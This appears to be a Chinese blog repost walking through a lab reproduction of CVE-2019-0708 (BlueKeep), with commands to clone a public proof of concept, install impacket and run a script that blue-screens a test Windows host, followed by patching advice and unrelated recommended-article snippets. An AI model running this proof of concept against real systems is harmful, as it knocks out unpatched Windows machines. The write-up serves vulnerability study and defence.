谣言传播代码复现_【漏洞复现】CVE 2019-0708 漏洞利用

最新推荐文章于 2022-05-20 22:25:26 发布
最新推荐文章于 2022-05-20 22:25:26 发布
阅读量120 收藏
点赞数
文章标签: 谣言传播代码复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_36413247/article/details/113411133
版权

beff35a6b6daf564206990347a8552e6.png

0x00 前言

2019年5月14日微软官方发布安全补丁,修复了Windows远程桌面服务的远程代码执行漏洞,该漏洞影响了某些旧版本的Windows系统。此漏洞是预身份验证且无需用户交互,这就意味着这个漏洞可以通过网络蠕虫的方式被利用。利用此漏洞的任何恶意软件都可能从被感染的计算机传播到其他易受攻击的计算机,其方式与2017年WannaCry恶意软件的传播方式类似。

以上内容来自360网络安全响应中心。 从微软官方的消息一出,各大安全厂商都开始发布了漏洞预警,那段时间我也一直在找对应的POC,但要不就是不能利用的POC,要不就是利用以前漏洞写的POC,更有甚着点击attack后给你惊喜。

d6a806636580999366f9a809778de3e1.gif

看到这个图片的时候,真的一副生无可恋的样子,随着时间推移,渐渐的也就不怎么关注这个漏洞了。 直到今天,看到网上有人发一些关于这个漏洞的利用复现视频的时候,才意识到已经过去正好一个月的,此时POC也早就被公布了。 早在在5月31日的时候,n1xbyte就在Github上发布了利用该漏洞导致系统蓝屏的可用POC ,所以我们来复现看看吧。

0x01 下载POC

首先git clone代码

git clone https://github.com/n1xbyte/CVE-2019-0708.git
cd CVE-2019-0708

7b0f6207c6bdc033b99def17b41e5e30.png

0x02 开始复现

1、为了顺利复现成功,需要将被攻击机的远程桌面设为允许,防火墙也需要关掉。 2、被攻击机的IP地址与操作系统信息如下:

#被攻击主机
ip地址:192.168.1.106
系统类型:64位

3、安装需要的库后执行POC

pip3 install impacket
python3 crashpoc.py 192.168.1.106 64  #python3 crashpoc.py ip地址 系统类型

51ce396c987fcaebb2bd2f39bf5e6da0.png

POC被成功被执行,虽然现阶段只是让目标蓝屏,但是对这个漏洞的利用手段绝对不会止步于此。

0x03 修复方案

1、最简便的方法就是安装一个安全管家,比如火绒、360之类的

2、把系统的自动更新打开或者到微软官网下载补丁

3、把自己电脑上的远程桌面关掉、防火墙开启

0x04 小结

总是有人说没有绝对的安全,当然事实也确实是如此,但是只要我们平时养成一个良好的安全习惯,还是可以避免很多病毒木马的侵害的,毕竟很多的恶意程序都是广撒网,捕的鱼多不多就是另一回事儿了。

最后再次强调,不得将本文用作违法犯罪目的,本文只用作技术分享交流学习使用。

更多信息欢迎关注我的微信公众号:teamssix
原文地址: https://www. teamssix.com/year/19061 5-013724.html
视频演示地址: https://www. bilibili.com/video/av55 626994/
K川是谁
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
谣言传播代码复现_今日 Paper | 社交媒体谣言检测;连续手语识别;细粒度服装相似性学习;混合图神经网络等...
weixin_42510243的博客
01-29 551
目录基于双向图卷积神经网络的社交媒体上谣言检测 用于连续手语识别的时空多线索网络基于属性特定嵌入网络的细粒度服装相似性学习混合图神经网络在人群计数中的应用使用卫星图像中的目标检测生成可解释的贫困地图基于双向图卷积神经网络的社交媒体上谣言检测 论文名称:Rumor Detection>作者:Bian Tian /Xiao Xi /Xu Tingyang /Zhao Peilin /Huang ...
360公司_RDP漏洞_CVE-2019-0708无损扫描工具_v2
07-03
0708Detector_v2.exe 程序是360公司的360Vulcan Team发布的一款针对编号为CVE-2019-0708的Windows远程桌面协议漏洞的检测程序,原则上该扫描程序不会造成目标系统出现蓝屏,请您测试后再使用。
C++编写谣言传播问题
coolsunxu的博客
12-02 2879
C++编写谣言传播问题
谣言传播
木森林的博客
01-31 506
题目: 总有一些人在造谣。现在有n个人,编号分别为1—n。造谣者向他们传播了m次谣言,每个谣言的影响范围不同。每次造谣者选中一个人A,若谣言的影响范围为B,则A会告诉所有与它编号的差不超过B的人。你的任务是计算每个人最后收到的是第几次谣言。 输入描述: 第1行输入n和m,接下来m行,每行两个数A 、B 输出描述: 输出一行n个数,第i个数表示编号位i的人收到的我最后一次谣言。没有收到谣言输出0 样例输入: 10 5 7 2 4 5 2 1 6 2 3 1 样例输出: 3 5 5 5 4 4 4 4 2 0
使用Go+UDP实现一个Gossip协议工具包(Gossip集群谣言传播与反熵传播的具体实现)
weixin_45743893的博客
05-20 902
工具包Github链接 https://github.com/dpwgc/pekonode 什么是Gossip? Gossip是一种具有随机性、传染性的网络协议。 Gossip的特点 使用简单,扩展性强,容错率高,去中心化,最终一致性。 Gossip是如何同步信息的? 当一个新节点A连接到Gossip集群内的某个节点B时,A节点会将自己的信息发送给B节点,然后B节点会在集群中随机选取几个节点,向他们广播A节点的信息(传染),集群中的其他节点收到A节点的信息后,又会像B节点那样广播A节点的信息给其他集群节点(
CVE-2019-0708poc利用
05-20
微软发布了针对远程桌面服务(以前称为终端服务)的关键远程执行代码漏洞CVE-2019-0708的修复程序,该漏洞影响了某些旧版本的Windows。此漏洞是预身份验证,无需用户交互。换句话说,该漏洞是“可传播的”,这意味着任何利用该漏洞的恶意软件都可能从受影响的计算机传播到受影响的计算机,就像2017年WannaCry恶意软件在全球蔓延一样。 受影响系统: Windows 7,windows-Server 2008 R2和Windows Server 2008,windows-Xp,windows 2003
CVE-2019-0708-Poc.rar
05-23
CVE-2019-0708 POC,检测工具 C:. │ cve_2019_0708.rb │ Dockerfile │ LICENSE │ list.txt │ README.md │ screenshot.png │ 使用说明.txt │ ├─docker │ entrypoint.sh │ setup.sh │ └─rdesktop-fork-bd6aa6acddf0ba640a49834807872f4cc0d0a773 │ .cvsignore │ asn.c │ bitmap.c │ bootstrap │ cache.c │ channels.c │ cliprdr.c │ config.guess │ config.sub │ configure.ac │ constants.h │ COPYING │ cssp.c │ ctrl.c │ disk.c │ disk.h │ ewmhints.c │ genauthors │ indent-all.sh │ install-sh │ iso.c │ licence.c │ lspci.c │ Makefile.in │ mcs.c │ mppc.c │ mst120.c │ orders.c │ orders.h │ parallel.c │ parse.h │ printer.c │ printercache.c │ proto.h │ proto.head │ proto.tail │ pstcache.c │ rdesktop │ rdesktop.c │ rdesktop.h │ rdesktop.spec │ rdp.c │ rdp5.c │ rdpdr.c │ rdpsnd.c │ rdpsnd.h │ rdpsnd_alsa.c │ rdpsnd_dsp.c │ rdpsnd_dsp.h │ rdpsnd_libao.c │ rdpsnd_oss.c │ rdpsnd_sgi.c │ rdpsnd_sun.c │ README │ scancodes.h │ scard.c │ scard.h │ seamless.c │ seamless.h │ secure.c │ serial.c │ ssl.c │ ssl.h │ tcp.c │ types.h │ utils.c │ xclip.c │ xkeymap.c │ xproto.h │ xwin.c │ ├─doc │ AUTHORS │ ChangeLog │ ctrl.txt │ HACKING │ ipv6.txt │ keymap-names.txt │ keymapping.txt │ keynums.png │ licensing.txt │ lspci-channel.txt │ makerelease.txt │ patches.txt │ rdesktop.1 │ rdpsnd-rec.txt │ rdpsnd.txt │ redirection.txt │ seamlessrdp-channel.txt │ TODO │ ├─keymaps │ ar │ common │ convert-map │ cs │ da │ de │ de-ch │ en-dv │ en-gb │ en-us │ en-us-intl │ es │ et │ fi │ fo │ fr │ fr-be │ fr-bepo │ fr-ca │ fr-ch │ he │ hr │ hu │ is │ it │ ja │ ko │ lt │ lv │ mk │ modifiers │ nl │ nl-be │ no │ pl │ pt │ pt-br │ ru │ sk │ sl │ sv │ th │ tr │ ├─tests │ brushtest.c │ brushtestMakefile │ notepadbehindwordpad.c │ ├─uiports │ makefile_nanox │ makefile_qt │ makefile_qte │ makefile_svga │ makefile_xxx │ nanoxreadme.txt │ nanoxwin.c │ qtereadme.txt │ qtewin.cpp │ qtewin.h │ qtreadme.txt │ qtwin.cpp │ qtwin.h │ readme.txt │ svgareadme.txt │ svgawin.c │ xxxwin.c │ └─vnc vnc.c vnc.h x11stubs.c x11stubs.h
论文研究-快速建立数据传输路径的谣传路由协议改进.pdf
09-10
针对无线传感器网络谣传路由协议(Rumor Routing Protocol,RRP)在生成数据传输路径的过程中,消息传播节点随机选择下一跳邻居节点发送消息所形成的数据传输路径可能出现回路现象、交叉现象以及查询流量大等问题,提出一种改进的谣传路由协议(NM-RRP),该协议通过在代理消息和查询消息中记录消息经过的节点及其邻居节点来选择下一跳节点,并且对消息传输经过节点的邻居节点留下信息,避免随机选择节点发送消息。实验证明,改进后的算法能有效避免消息在某个节点附近产生传播、回路及交叉等现象,并能够快速建立数据传输路径。
社交网络上谣言传播的能量模型
02-23
社交网络上谣言传播的能量模型
基于遗传算法的WSN谣传路由的改进 (2012年)
05-23
谣传算法是一种基于数据查询的无线传感器网络路由机制,它通过事件agent和查询agent形成的路径交叉生成一个路由,该算法存在着路径非最优化问题。为此,提出了一种基于遗传算法的谣传路由协议,它由谣传算法生成多条路径,利用遗传算法对此多条路径进行操作,将能量消耗作为评价指标,生成最优的路径。仿真表明,此算法能有效的降低节点的能量消耗,极大的延长了网络的生存时间。
weblogic 端口号_【漏洞复现】Weblogic反序列化漏洞(CVE-2018-2628)
weixin_31414801的博客
01-10 106
漏洞描述:Weblogic Server中的RMI 通信使用T3协议在Weblogic Server和其它Java程序(客户端或者其它Weblogic Server实例)之间传输数据, 服务器实例会跟踪连接到应用程序的每个Java虚拟机(JVM)中, 并创建T3协议通信连接, 将流量传输到Java虚拟机. T3协议在开放WebLogic控制台端口的应用上默认开启. 攻击者可以通过T3协议发送恶意的...
路由完整实例代码
a662852186的博客
06-10 800
D:\workspace\xxx\src\main.js import Vue from 'vue' import App from './App' import VueRouter from 'vue-router' import Apple from '@/components/Apple' import RedApple from '@/components/RedA...
Rumor谣传路由协议
糖糖的daddy
08-24 6430
Rumor协议是在DD路由协议的基础上演化而来的,有的场合中,如果需要进行的消息查询是少量的,那么DD路由协议的路由建立开销太大就会造成资源浪费。因此,Braginsky D.等人针对少量数据传输提出了Rumor谣传路由协议。该协议采用随机的单播查询消息给某个邻居节点,这样就会使得路由建立开销大大减少。    当节点检查到目标事件后,将其保存并创建一个Agent消息(包括名称、到事件起源地的跳数、
社交网络中谣言传播动力学研究
03-17
社交网络中谣言传播动力学研究
CVE-2019-0708:Windows远程桌面UAF漏洞分析与复现
CVE-2019-0708是一个远程代码执行漏洞,微软在2019年5月发布了紧急补丁来修复这个问题。该漏洞可能影响到包括Windows 7、Windows Server 2008 R2、Windows Server 2008、Windows Server 2003和Windows XP在内的旧版...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值